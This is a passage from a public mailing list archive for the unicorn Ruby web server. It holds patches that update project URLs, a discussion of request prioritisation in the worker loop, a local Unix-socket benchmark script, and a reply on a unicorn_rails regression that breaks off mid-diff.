 If your issue is of a sensitive nature or you're just shy in public,
@@ -73,10 +73,10 @@ document distributed with git) on guidelines for patch submission.
 
 == Contact Info
 
-* public: mailto:unicorn-public@bogomips.org
-* nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+* public: mailto:unicorn-public@yhbt.net
+* nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 * nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-* https://bogomips.org/unicorn-public/
+* https://yhbt.net/unicorn-public/
 * http://ou63pmih66umazou.onion/unicorn-public/
 
 Mailing list subscription is optional, so Cc: all participants.
@@ -84,13 +84,13 @@ Mailing list subscription is optional, so Cc: all participants.
 You can follow along via NNTP (read-only):
 
 	nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn
-	nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+	nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 
 Or Atom feeds:
 
-	https://bogomips.org/unicorn-public/new.atom
+	https://yhbt.net/unicorn-public/new.atom
 	http://ou63pmih66umazou.onion/unicorn-public/new.atom
 
-	The HTML archives at https://bogomips.org/unicorn-public/
+	The HTML archives at https://yhbt.net/unicorn-public/
 	also has links to per-thread Atom feeds and downloadable
 	mboxes.
diff --git a/KNOWN_ISSUES b/KNOWN_ISSUES
index ebd4822..0017f20 100644
--- a/KNOWN_ISSUES
+++ b/KNOWN_ISSUES
@@ -9,7 +9,7 @@ acceptable solution.  Those issues are documented here.
   handlers.
 
 * Issues with FreeBSD jails can be worked around as documented by Tatsuya Ono:
-  https://bogomips.org/unicorn-public/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com/
+  https://yhbt.net/unicorn-public/CAHBuKRj09FdxAgzsefJWotexw-7JYZGJMtgUp_dhjPz9VbKD6Q@mail.gmail.com/
 
 * PRNGs (pseudo-random number generators) loaded before forking
   (e.g. "preload_app true") may need to have their internal state
@@ -60,7 +60,7 @@ acceptable solution.  Those issues are documented here.
   application to use Rails 2.3.2 and you have no other choice, then
   you may edit your unicorn gemspec and remove the Rack dependency.
 
-  ref: https://bogomips.org/unicorn-public/20091014221552.GA30624@dcvr.yhbt.net/
+  ref: https://yhbt.net/unicorn-public/20091014221552.GA30624@dcvr.yhbt.net/
   Note: the workaround described in the article above only made
   the issue more subtle and we didn't notice them immediately.
 
diff --git a/Links b/Links
index 10551a6..f81142d 100644
--- a/Links
+++ b/Links
@@ -2,7 +2,7 @@
 
 If you're interested in unicorn, you may be interested in some of the projects
 listed below.  If you have any links to add/change/remove, please tell us at
-mailto:unicorn-public@bogomips.org!
+mailto:unicorn-public@yhbt.net!
 
 == Disclaimer
 
@@ -23,10 +23,10 @@ or services behind them.
 * {golden_brindle}[https://github.com/simonoff/golden_brindle] - tool to
   manage multiple unicorn instances/applications on a single server
 
-* {raindrops}[https://bogomips.org/raindrops/] - real-time stats for
+* {raindrops}[https://yhbt.net/raindrops/] - real-time stats for
   preforking Rack servers
 
-* {UnXF}[https://bogomips.org/unxf/]  Un-X-Forward* the Rack environment,
+* {UnXF}[https://yhbt.net/unxf/]  Un-X-Forward* the Rack environment,
   useful since unicorn is designed to be deployed behind a reverse proxy.
 
 === unicorn is written to work with
@@ -52,7 +52,7 @@ or services behind them.
 * {Mongrel}[https://rubygems.org/gems/mongrel] - the awesome webserver
   unicorn is based on.  A historical archive of the mongrel dev list
   featuring early discussions of unicorn is available at:
-  https://bogomips.org/mongrel-devel/
+  https://yhbt.net/mongrel-devel/
 
-* {david}[https://bogomips.org/david.git] - a tool to explain why you need
+* {david}[https://yhbt.net/david.git] - a tool to explain why you need
   nginx in front of unicorn
diff --git a/README b/README
index 89467fc..0e95f48 100644
--- a/README
+++ b/README
@@ -80,12 +80,12 @@ You may install it via RubyGems on RubyGems.org:
 You can get the latest source via git from the following locations
 (these versions may not be stable):
 
-  https://bogomips.org/unicorn.git
+  https://yhbt.net/unicorn.git
   https://repo.or.cz/unicorn.git (mirror)
 
 You may browse the code from the web:
 
-* https://bogomips.org/unicorn.git
+* https://yhbt.net/unicorn.git
 * https://repo.or.cz/w/unicorn.git (gitweb)
 
 See the HACKING guide on how to contribute and build prerelease gems
@@ -133,13 +133,13 @@ and libraries which run on top of it.
 
 All feedback (bug reports, user/development dicussion, patches, pull
 requests) go to the mailing list/newsgroup.  See the ISSUES document for
-information on the {mailing list}[mailto:unicorn-public@bogomips.org].
+information on the {mailing list}[mailto:unicorn-public@yhbt.net].
 
-The mailing list is archived at https://bogomips.org/unicorn-public/
+The mailing list is archived at https://yhbt.net/unicorn-public/
 Read-only NNTP access is available at:
 nntp://news.public-inbox.org/inbox.comp.lang.ruby.unicorn and
-nntp://news.gmane.org/gmane.comp.lang.ruby.unicorn.general
+nntp://news.gmane.io/gmane.comp.lang.ruby.unicorn.general
 
 For the latest on unicorn releases, you may also finger us at
-unicorn@bogomips.org or check our NEWS page (and subscribe to our Atom
+unicorn@yhbt.net or check our NEWS page (and subscribe to our Atom
 feed).
diff --git a/SIGNALS b/SIGNALS
index 1af851d..7321f2b 100644
--- a/SIGNALS
+++ b/SIGNALS
@@ -8,7 +8,7 @@ should be possible to easily share process management scripts between
 Unicorn and nginx.
 
 One example init script is distributed with unicorn:
-https://bogomips.org/unicorn/examples/init.sh
+https://yhbt.net/unicorn/examples/init.sh
 
 === Master Process
 
diff --git a/Sandbox b/Sandbox
index d0f915e..651e5cd 100644
--- a/Sandbox
+++ b/Sandbox
@@ -34,7 +34,7 @@ is the primary issue with sandboxing tools such as Bundler and Isolate.
 If you're bundling unicorn, use "bundle exec unicorn" (or "bundle exec
 unicorn_rails") to start unicorn with the correct environment variables
 
-ref: https://bogomips.org/unicorn-public/9ECF07C4-5216-47BE-961D-AFC0F0C82060@internetfamo.us/
+ref: https://yhbt.net/unicorn-public/9ECF07C4-5216-47BE-961D-AFC0F0C82060@internetfamo.us/
 
 Otherwise (if you choose to not sandbox your unicorn installation), we
 expect the tips for Isolate (below) apply, too.
@@ -44,7 +44,7 @@ expect the tips for Isolate (below) apply, too.
 This is no longer be an issue as of bundler 0.9.17
 
 ref:
-https://bogomips.org/unicorn-public/8FC34B23-5994-41CC-B5AF-7198EF06909E@tramchase.com/
+https://yhbt.net/unicorn-public/8FC34B23-5994-41CC-B5AF-7198EF06909E@tramchase.com/
 
 === BUNDLE_GEMFILE for Capistrano users
 
diff --git a/archive/slrnpull.conf b/archive/slrnpull.conf
index fcfcafe..fd04f97 100644
--- a/archive/slrnpull.conf
+++ b/archive/slrnpull.conf
@@ -1,4 +1,4 @@
 # group_name                         max        expire     headers_only
 gmane.comp.lang.ruby.unicorn.general 1000000000 1000000000 0
 
-# usage: slrnpull -d $PWD -h news.gmane.org --no-post
+# usage: slrnpull -d $PWD -h news.gmane.io --no-post
diff --git a/examples/big_app_gc.rb b/examples/big_app_gc.rb
index 9d05719..c1bae10 100644
--- a/examples/big_app_gc.rb
+++ b/examples/big_app_gc.rb
@@ -1,2 +1,2 @@
-# see {Unicorn::OobGC}[https://bogomips.org/unicorn/Unicorn/OobGC.html]
+# see {Unicorn::OobGC}[https://yhbt.net/unicorn/Unicorn/OobGC.html]
 # Unicorn::OobGC was broken in Unicorn v3.3.1 - v3.6.1 and fixed in v3.6.2
diff --git a/examples/logrotate.conf b/examples/logrotate.conf
index 77a01b5..c3aa40d 100644
--- a/examples/logrotate.conf
+++ b/examples/logrotate.conf
@@ -5,7 +5,7 @@
 #    https://linux.die.net/man/8/logrotate
 #
 # public logrotate-related discussion in our archives:
-#    https://bogomips.org/unicorn-public/?q=logrotate
+#    https://yhbt.net/unicorn-public/?q=logrotate
 
 # Modify the following glob to match the logfiles your app writes to:
 /var/log/unicorn_app/*.log {
@@ -33,7 +33,7 @@
 		systemctl kill -s SIGUSR1 unicorn@2.service
 
 		# Examples for other process management systems appreciated
-		# Mail us at unicorn-public@bogomips.org
+		# Mail us at unicorn-public@yhbt.net
 		# (see above for archives)
 
 		# If you use a pid file and assuming your pid file
diff --git a/examples/nginx.conf b/examples/nginx.conf
index b6b69c1..c5026f9 100644
--- a/examples/nginx.conf
+++ b/examples/nginx.conf
@@ -113,7 +113,7 @@ http {
     # try_files directive appeared in in nginx 0.7.27 and has stabilized
     # over time.  Older versions of nginx (e.g. 0.6.x) requires
     # "if (!-f $request_filename)" which was less efficient:
-    # https://bogomips.org/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
+    # https://yhbt.net/unicorn.git/tree/examples/nginx.conf?id=v3.3.1#n127
     try_files $uri/index.html $uri.html $uri @app;
 
     location @app {
diff --git a/examples/unicorn.conf.minimal.rb b/examples/unicorn.conf.minimal.rb
index 2d1bf0a..46fd634 100644
--- a/examples/unicorn.conf.minimal.rb
+++ b/examples/unicorn.conf.minimal.rb
@@ -1,9 +1,9 @@
 # Minimal sample configuration file for Unicorn (not Rack) when used
 # with daemonization (unicorn -D) started in your working directory.
 #
-# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
+# See https://yhbt.net/unicorn/Unicorn/Configurator.html for complete
 # documentation.
-# See also https://bogomips.org/unicorn/examples/unicorn.conf.rb for
+# See also https://yhbt.net/unicorn/examples/unicorn.conf.rb for
 # a more verbose configuration using more features.
 
 listen 2007 # by default Unicorn listens on port 8080
diff --git a/examples/unicorn.conf.rb b/examples/unicorn.conf.rb
index d2897ef..d90bdc4 100644
--- a/examples/unicorn.conf.rb
+++ b/examples/unicorn.conf.rb
@@ -2,10 +2,10 @@
 #
 # This configuration file documents many features of Unicorn
 # that may not be needed for some applications. See
-# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
+# https://yhbt.net/unicorn/examples/unicorn.conf.minimal.rb
 # for a much simpler configuration file.
 #
-# See https://bogomips.org/unicorn/Unicorn/Configurator.html for complete
+# See https://yhbt.net/unicorn/Unicorn/Configurator.html for complete
 # documentation.
 
 # Use at least one worker per core if you're on a dedicated server,
diff --git a/ext/unicorn_http/unicorn_http.rl b/ext/unicorn_http/unicorn_http.rl
index 8ef23bc..dfe3a63 100644
--- a/ext/unicorn_http/unicorn_http.rl
+++ b/ext/unicorn_http/unicorn_http.rl
@@ -487,7 +487,7 @@ static void set_url_scheme(VALUE env, VALUE *server_port)
      * and X-Forwarded-Proto handling from this parser?  We've had it
      * forever and nobody has said anything against it, either.
      * Anyways, please send comments to our public mailing list:
-     * unicorn-public@bogomips.org (no HTML mail, no subscription necessary)
+     * unicorn-public@yhbt.net (no HTML mail, no subscription necessary)
      */
     scheme = rb_hash_aref(env, g_http_x_forwarded_ssl);
     if (!NIL_P(scheme) && STR_CSTR_EQ(scheme, "on")) {
diff --git a/lib/unicorn.rb b/lib/unicorn.rb
index dd5dff4..d5991fe 100644
--- a/lib/unicorn.rb
+++ b/lib/unicorn.rb
@@ -96,7 +96,7 @@ def self.builder(ru, op)
 
   # returns an array of strings representing TCP listen socket addresses
   # and Unix domain socket paths.  This is useful for use with
-  # Raindrops::Middleware under Linux: https://bogomips.org/raindrops/
+  # Raindrops::Middleware under Linux: https://yhbt.net/raindrops/
   def self.listener_names
     Unicorn::HttpServer::LISTENERS.map do |io|
       Unicorn::SocketHelper.sock_name(io)
diff --git a/lib/unicorn/configurator.rb b/lib/unicorn/configurator.rb
index e8b76f5..c3a4f2d 100644
--- a/lib/unicorn/configurator.rb
+++ b/lib/unicorn/configurator.rb
@@ -3,11 +3,11 @@
 
 # Implements a simple DSL for configuring a unicorn server.
 #
-# See https://bogomips.org/unicorn/examples/unicorn.conf.rb and
-# https://bogomips.org/unicorn/examples/unicorn.conf.minimal.rb
+# See https://yhbt.net/unicorn/examples/unicorn.conf.rb and
+# https://yhbt.net/unicorn/examples/unicorn.conf.minimal.rb
 # example configuration files.  An example config file for use with
 # nginx is also available at
-# https://bogomips.org/unicorn/examples/nginx.conf
+# https://yhbt.net/unicorn/examples/nginx.conf
 #
 # See the link:/TUNING.html document for more information on tuning unicorn.
 class Unicorn::Configurator
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0..a52931a 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -6,7 +6,7 @@
 # forked worker children.
 #
 # Users do not need to know the internals of this class, but reading the
-# {source}[https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb]
+# {source}[https://yhbt.net/unicorn.git/tree/lib/unicorn/http_server.rb]
 # is education for programmers wishing to learn how unicorn works.
 # See Unicorn::Configurator for information on how to configure unicorn.
 class Unicorn::HttpServer
diff --git a/lib/unicorn/oob_gc.rb b/lib/unicorn/oob_gc.rb
index c4741a0..3b2f488 100644
--- a/lib/unicorn/oob_gc.rb
+++ b/lib/unicorn/oob_gc.rb
@@ -43,8 +43,8 @@
 #     use Unicorn::OobGC, 2, %r{\A/(?:expensive/foo|more_expensive/foo)}
 #
 # Feedback from users of early implementations of this module:
-# * https://bogomips.org/unicorn-public/0BFC98E9-072B-47EE-9A70-05478C20141B@lukemelia.com/
-# * https://bogomips.org/unicorn-public/AANLkTilUbgdyDv9W1bi-s_W6kq9sOhWfmuYkKLoKGOLj@mail.gmail.com/
+# * https://yhbt.net/unicorn-public/0BFC98E9-072B-47EE-9A70-05478C20141B@lukemelia.com/
+# * https://yhbt.net/unicorn-public/AANLkTilUbgdyDv9W1bi-s_W6kq9sOhWfmuYkKLoKGOLj@mail.gmail.com/
 
 module Unicorn::OobGC
 
diff --git a/unicorn.gemspec b/unicorn.gemspec
index ceea831..a189f8d 100644
--- a/unicorn.gemspec
+++ b/unicorn.gemspec
@@ -15,14 +15,14 @@
   s.authors = ['unicorn hackers']
   s.summary = 'Rack HTTP server for fast clients and Unix'
   s.description = File.read('README').split("\n\n")[1]
-  s.email = %q{unicorn-public@bogomips.org}
+  s.email = %q{unicorn-public@yhbt.net}
   s.executables = %w(unicorn unicorn_rails)
   s.extensions = %w(ext/unicorn_http/extconf.rb)
   s.extra_rdoc_files = IO.readlines('.document').map!(&:chomp!).keep_if do |f|
     File.exist?(f)
   end
   s.files = manifest
-  s.homepage = 'https://bogomips.org/unicorn/'
+  s.homepage = 'https://yhbt.net/unicorn/'
   s.test_files = test_files
 
   # technically we need ">= 1.9.3", too, but avoid the array here since

^ permalink raw reply related	[relevance 1%]

* Re: Traffic priority with Unicorn
  2019-12-17  5:12  0% ` Eric Wong
@ 2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 0 replies; 200+ results
From: Bertrand Paquet @ 2019-12-18 22:06 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

On Tue, 17 Dec 2019 at 06:12, Eric Wong <bofh@yhbt.net> wrote:
>
> Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> > Hello,
> >
> > I would like to introduce some traffic priority in Unicorn. The goal
> > is to keep critical endpoints online even if the application is
> > slowing down a lot.
> >
> > The idea is to classify the request at nginx level (by vhost, http
> > path, header or whatever), and send the queries to two different
> > unicorn sockets (opened by the same unicorn instance): one for high
> > priority request, one for low priority request.
> > I need to do some small modifications [1] in the unicorn worker loop
> > to process high priority requests first. It seems to work:
> > - I launch a first apache bench toward the low priority port
> > - I launch a second apache bench toward the high priority port
> > - Unicorn handles the queries only for that one, and stop answering to
> > the low priority traffic
>
> > [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
>
> Easier to view locally w/o JS/CSS using "git show -W" for context:
>
> $ git remote add bpaquet https://github.com/bpaquet/unicorn
> $ git fetch bpaquet
> $ git show -W 58d6ba28
>   <snip>
> diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
> index 5334fa0c..976b728e 100644
> --- a/lib/unicorn/http_server.rb
> +++ b/lib/unicorn/http_server.rb
> @@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
>    # runs inside each forked worker, this sits around and waits
>    # for connections and doesn't die until the parent dies (or is
>    # given a INT, QUIT, or TERM signal)
>    def worker_loop(worker)
>      ppid = @master_pid
>      readers = init_worker_process(worker)
>      nr = 0 # this becomes negative if we need to reopen logs
>
>      # this only works immediately if the master sent us the signal
>      # (which is the normal case)
>      trap(:USR1) { nr = -65536 }
>
>      ready = readers.dup
> +    high_priority_reader = readers.first
> +    last_processed_is_high_priority = false
>      @after_worker_ready.call(self, worker)
>
>      begin
>        nr < 0 and reopen_worker_logs(worker.nr)
>        nr = 0
>        worker.tick = time_now.to_i
>        tmp = ready.dup
>        while sock = tmp.shift
>          # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
>          # but that will return false
>          if client = sock.kgio_tryaccept
> +          last_processed_is_high_priority = sock == high_priority_reader
>            process_client(client)
>            nr += 1
>            worker.tick = time_now.to_i
>          end
> -        break if nr < 0
> +        break if nr < 0 || last_processed_is_high_priority
>        end
>
>        # make the following bet: if we accepted clients this round,
>        # we're probably reasonably busy, so avoid calling select()
>        # and do a speculative non-blocking accept() on ready listeners
>        # before we sleep again in select().
> -      unless nr == 0
> +      unless nr == 0 || !last_processed_is_high_priority
>          tmp = ready.dup
>          redo
>        end
>
>        ppid == Process.ppid or return
>
>        # timeout used so we can detect parent death:
>        worker.tick = time_now.to_i
>        ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
>      rescue => e
>        redo if nr < 0 && readers[0]
>        Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
>      end while readers[0]
>    end
>
>    # delivers a signal to a worker and fails gracefully if the worker
>    # is no longer running.
>
> > The tradeoff are
> > - No more "bet"[2] on low priority traffic. This is probably slowing
> > down a little bit the low  priority traffic.
>
> Yeah, but low priority is low priority, so it's fine to slow
> them down, right? :>
>
> > - This approach is only low / high. Not sure if I can extend it for 3
> > (or more) level of priority without a non negligible performance
> > impact (because of the "bet" above).
>
> I don't think it makes sense to have more than two levels of
> priority (zero, one, two, infinity rule?)
> <https://en.wikipedia.org/wiki/Zero_One_Infinity>
>
> > Do you think this approach is correct?
>
> readers order isn't guaranteed, especially when inheriting
> sockets from systemd or similar launchers.

Interesting point.

>
> I think some sort order could be defined via listen option...
>
> I'm not sure if inheriting multiple sockets from systemd or
> similar launchers using LISTEN_FDS env can guarantee ordering
> (or IO.select in Ruby, for that matter).
>
> It seems OK otherwise, I think...  Have you tested in real world?

Not yet. But I will probably test it soon.

>
> > Do you have any better idea to have some traffic prioritization?
> > (Another idea is to have dedicated workers for each priority class.
> > This approach has other downsides, I would like to avoid it).
> > Is it something we can  introduce in Unicorn (not as default
> > behaviour, but as a configuration option)?
>
> If you're willing to drop some low-priority requests, using a
> small listen :backlog value for a low-priority listen may work.
>
> I'm hesitant to put extra code in worker_loop method since
> it can slow down current users who don't need the feature.
>
> Instead, perhaps try replacing the worker_loop method entirely
> (similar to how oob_gc.rb wraps process_client) so users who
> don't enable the feature won't be penalized with extra code.
> Users who opt into the feature can get an entirely different
> method.

Ok I will try this approach. I'm a little bit annoyed by the code duplication.

>
> > Thx for any opinion.
>
> The best option would be to never get yourself in a situation
> where you're never overloaded by making everything fast :>
> Anything else seems pretty ugly...

On a system which handle 10k QPS, it's really difficult to never have
an issue somewhere :)

Thx

Bertrand

^ permalink raw reply	[relevance 0%]

* Re: Traffic priority with Unicorn
  2019-12-16 22:34  2% Traffic priority with Unicorn Bertrand Paquet
@ 2019-12-17  5:12  0% ` Eric Wong
  2019-12-18 22:06  0%   ` Bertrand Paquet
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2019-12-17  5:12 UTC (permalink / raw)
  To: Bertrand Paquet; +Cc: unicorn-public

Bertrand Paquet <bertrand.paquet@doctolib.com> wrote:
> Hello,
> 
> I would like to introduce some traffic priority in Unicorn. The goal
> is to keep critical endpoints online even if the application is
> slowing down a lot.
> 
> The idea is to classify the request at nginx level (by vhost, http
> path, header or whatever), and send the queries to two different
> unicorn sockets (opened by the same unicorn instance): one for high
> priority request, one for low priority request.
> I need to do some small modifications [1] in the unicorn worker loop
> to process high priority requests first. It seems to work:
> - I launch a first apache bench toward the low priority port
> - I launch a second apache bench toward the high priority port
> - Unicorn handles the queries only for that one, and stop answering to
> the low priority traffic

> [1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#

Easier to view locally w/o JS/CSS using "git show -W" for context:

$ git remote add bpaquet https://github.com/bpaquet/unicorn
$ git fetch bpaquet
$ git show -W 58d6ba28
  <snip>
diff --git a/lib/unicorn/http_server.rb b/lib/unicorn/http_server.rb
index 5334fa0c..976b728e 100644
--- a/lib/unicorn/http_server.rb
+++ b/lib/unicorn/http_server.rb
@@ -676,53 +676,56 @@ def reopen_worker_logs(worker_nr)
   # runs inside each forked worker, this sits around and waits
   # for connections and doesn't die until the parent dies (or is
   # given a INT, QUIT, or TERM signal)
   def worker_loop(worker)
     ppid = @master_pid
     readers = init_worker_process(worker)
     nr = 0 # this becomes negative if we need to reopen logs
 
     # this only works immediately if the master sent us the signal
     # (which is the normal case)
     trap(:USR1) { nr = -65536 }
 
     ready = readers.dup
+    high_priority_reader = readers.first
+    last_processed_is_high_priority = false
     @after_worker_ready.call(self, worker)
 
     begin
       nr < 0 and reopen_worker_logs(worker.nr)
       nr = 0
       worker.tick = time_now.to_i
       tmp = ready.dup
       while sock = tmp.shift
         # Unicorn::Worker#kgio_tryaccept is not like accept(2) at all,
         # but that will return false
         if client = sock.kgio_tryaccept
+          last_processed_is_high_priority = sock == high_priority_reader
           process_client(client)
           nr += 1
           worker.tick = time_now.to_i
         end
-        break if nr < 0
+        break if nr < 0 || last_processed_is_high_priority
       end
 
       # make the following bet: if we accepted clients this round,
       # we're probably reasonably busy, so avoid calling select()
       # and do a speculative non-blocking accept() on ready listeners
       # before we sleep again in select().
-      unless nr == 0
+      unless nr == 0 || !last_processed_is_high_priority
         tmp = ready.dup
         redo
       end
 
       ppid == Process.ppid or return
 
       # timeout used so we can detect parent death:
       worker.tick = time_now.to_i
       ret = IO.select(readers, nil, nil, @timeout) and ready = ret[0]
     rescue => e
       redo if nr < 0 && readers[0]
       Unicorn.log_error(@logger, "listen loop error", e) if readers[0]
     end while readers[0]
   end
 
   # delivers a signal to a worker and fails gracefully if the worker
   # is no longer running.

> The tradeoff are
> - No more "bet"[2] on low priority traffic. This is probably slowing
> down a little bit the low  priority traffic.

Yeah, but low priority is low priority, so it's fine to slow
them down, right? :>

> - This approach is only low / high. Not sure if I can extend it for 3
> (or more) level of priority without a non negligible performance
> impact (because of the "bet" above).

I don't think it makes sense to have more than two levels of
priority (zero, one, two, infinity rule?)
<https://en.wikipedia.org/wiki/Zero_One_Infinity>

> Do you think this approach is correct?

readers order isn't guaranteed, especially when inheriting
sockets from systemd or similar launchers.

I think some sort order could be defined via listen option...

I'm not sure if inheriting multiple sockets from systemd or
similar launchers using LISTEN_FDS env can guarantee ordering
(or IO.select in Ruby, for that matter).

It seems OK otherwise, I think...  Have you tested in real world?

> Do you have any better idea to have some traffic prioritization?
> (Another idea is to have dedicated workers for each priority class.
> This approach has other downsides, I would like to avoid it).
> Is it something we can  introduce in Unicorn (not as default
> behaviour, but as a configuration option)?

If you're willing to drop some low-priority requests, using a
small listen :backlog value for a low-priority listen may work.

I'm hesitant to put extra code in worker_loop method since
it can slow down current users who don't need the feature.

Instead, perhaps try replacing the worker_loop method entirely
(similar to how oob_gc.rb wraps process_client) so users who
don't enable the feature won't be penalized with extra code.
Users who opt into the feature can get an entirely different
method.

> Thx for any opinion.

The best option would be to never get yourself in a situation
where you're never overloaded by making everything fast :>
Anything else seems pretty ugly...

^ permalink raw reply related	[relevance 0%]

* Traffic priority with Unicorn
@ 2019-12-16 22:34  2% Bertrand Paquet
  2019-12-17  5:12  0% ` Eric Wong
  0 siblings, 1 reply; 200+ results
From: Bertrand Paquet @ 2019-12-16 22:34 UTC (permalink / raw)
  To: unicorn-public

Hello,

I would like to introduce some traffic priority in Unicorn. The goal
is to keep critical endpoints online even if the application is
slowing down a lot.

The idea is to classify the request at nginx level (by vhost, http
path, header or whatever), and send the queries to two different
unicorn sockets (opened by the same unicorn instance): one for high
priority request, one for low priority request.
I need to do some small modifications [1] in the unicorn worker loop
to process high priority requests first. It seems to work:
- I launch a first apache bench toward the low priority port
- I launch a second apache bench toward the high priority port
- Unicorn handles the queries only for that one, and stop answering to
the low priority traffic

The tradeoff are
- No more "bet"[2] on low priority traffic. This is probably slowing
down a little bit the low  priority traffic.
- This approach is only low / high. Not sure if I can extend it for 3
(or more) level of priority without a non negligible performance
impact (because of the "bet" above).

Do you think this approach is correct?
Do you have any better idea to have some traffic prioritization?
(Another idea is to have dedicated workers for each priority class.
This approach has other downsides, I would like to avoid it).
Is it something we can  introduce in Unicorn (not as default
behaviour, but as a configuration option)?

Thx for any opinion.

Bertrand

[1] https://github.com/bpaquet/unicorn/commit/58d6ba2805d4399f680f97eefff82c407e0ed30f#
[2] https://bogomips.org/unicorn.git/tree/lib/unicorn/http_server.rb#n707

^ permalink raw reply	[relevance 2%]

* [PATCH 3/3] test/benchmark/uconnect: test for accept loop speed
  @ 2019-05-12 22:25  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2019-05-12 22:25 UTC (permalink / raw)
  To: unicorn-public

In preparation for kgio removal, I want to ensure we can
maintain existing performance when swapping kgio_tryaccept
for accept_nonblock on Ruby 2.3+

There's plenty of TCP benchmarking tools, but TCP port reuse
delays hurt predictability since unicorn doesn't do persistent
connections.

So this is exclusively for Unix sockets and uses Perl instead
of Ruby since I don't want to be bothered with GC
unpredictability on the client side.
---
 test/benchmark/uconnect.perl | 66 ++++++++++++++++++++++++++++++++++++
 1 file changed, 66 insertions(+)
 create mode 100755 test/benchmark/uconnect.perl

diff --git a/test/benchmark/uconnect.perl b/test/benchmark/uconnect.perl
new file mode 100755
index 0000000..230445e
--- /dev/null
+++ b/test/benchmark/uconnect.perl
@@ -0,0 +1,66 @@
+#!/usr/bin/perl -w
+# Benchmark script to spawn some processes and hammer a local unicorn
+# to test accept loop performance.  This only does Unix sockets.
+# There's plenty of TCP benchmarking tools out there, and TCP port reuse
+# has predictability problems since unicorn can't do persistent connections.
+# Written in Perl for the same reason: predictability.
+# Ruby GC is not as predictable as Perl refcounting.
+use strict;
+use Socket qw(AF_UNIX SOCK_STREAM sockaddr_un);
+use POSIX qw(:sys_wait_h);
+use Getopt::Std;
+# -c / -n switches stolen from ab(1)
+my $usage = "$0 [-c CONCURRENCY] [-n NUM_REQUESTS] SOCKET_PATH\n";
+our $opt_c = 2;
+our $opt_n = 1000;
+getopts('c:n:') or die $usage;
+my $unix_path = shift or die $usage;
+use constant REQ => "GET / HTTP/1.1\r\nHost: example.com\r\n\r\n";
+use constant REQ_LEN => length(REQ);
+use constant BUFSIZ => 8192;
+$^F = 99; # don't waste syscall time with FD_CLOEXEC
+
+my %workers; # pid => worker num
+die "-n $opt_n not evenly divisible by -c $opt_c\n" if $opt_n % $opt_c;
+my $n_per_worker = $opt_n / $opt_c;
+my $addr = sockaddr_un($unix_path);
+
+for my $num (1..$opt_c) {
+	defined(my $pid = fork) or die "fork failed: $!\n";
+	if ($pid) {
+		$workers{$pid} = $num;
+	} else {
+		work($n_per_worker);
+	}
+}
+
+reap_worker(0) while scalar keys %workers;
+exit;
+
+sub work {
+	my ($n) = @_;
+	my ($buf, $x);
+	for (1..$n) {
+		socket(S, AF_UNIX, SOCK_STREAM, 0) or die "socket: $!";
+		connect(S, $addr) or die "connect: $!";
+		defined($x = syswrite(S, REQ)) or die "write: $!";
+		$x == REQ_LEN or die "short write: $x != ".REQ_LEN."\n";
+		do {
+			$x = sysread(S, $buf, BUFSIZ);
+			unless (defined $x) {
+				next if $!{EINTR};
+				die "sysread: $!\n";
+			}
+		} until ($x == 0);
+	}
+	exit 0;
+}
+
+sub reap_worker {
+	my ($flags) = @_;
+	my $pid = waitpid(-1, $flags);
+	return if !defined $pid || $pid <= 0;
+	my $p = delete $workers{$pid} || '(unknown)';
+	warn("$pid [$p] exited with $?\n") if $?;
+	$p;
+}
-- 
EW


^ permalink raw reply related	[relevance 5%]

* Re: Issues after 5.5.0 upgrade
  @ 2019-03-06  5:57  2%       ` Jeremy Evans
  0 siblings, 0 replies; 200+ results
From: Jeremy Evans @ 2019-03-06  5:57 UTC (permalink / raw)
  To: Eric Wong; +Cc: Stan Pitucha, unicorn-public

On 03/06 04:44, Eric Wong wrote:
> Stan Pitucha <stan.pitucha@envato.com> wrote:
> > > I only saw one issue (proposed fix below).
> > Sorry, I solved the other one while writing the email but forgot to
> > update the intro.
> >
> > So the fix worked for the issue I mentioned, thanks! Also, running
> > unicorn directly works just fine now.
> 
> You're welcome and thanks for following up!
> 
> > I ran into another regression with unicorn_rails though. We're doing
> > some work in `after_fork` which relies on a class found in
> > `lib/logger_switcher.rb`. Unfortunately it looks like the scope
> > changed and now I get workers respawning in a loop:
> > 
> > E, [2019-03-06T15:03:04.990789 #46680] ERROR -- : uninitialized
> > constant #<Class:#<Unicorn::Configurator:0x00007fc3d113d098>>::LoggerSwitcher
> > (NameError)
> 
> Is this with `preload_app true`?  I'm not too up-to-date
> with scoping and namespace behavior stuff, actually.

This is just a guess, but we probably want to call the Unicorn.builder
lambda with the same arguments as the rails_builder lambda.

diff --git a/bin/unicorn_rails b/bin/unicorn_rails
index ea4f822..354c1df 100755
--- a/bin/unicorn_rails
+++ b/bin/unicorn_rails
@@ -132,11 +132,11 @@ def rails_builder(ru, op, daemonize)
 
   # this lambda won't run until after forking if preload_app is false
   # this runs after config file reloading
-  lambda do ||
+  lambda do |x, server|
     # Rails 3 includes a config.ru, use it if we find it after
     # working_directory is bound.
     ::File.exist?('config.ru') and
-      return Unicorn.builder('config.ru', op).call
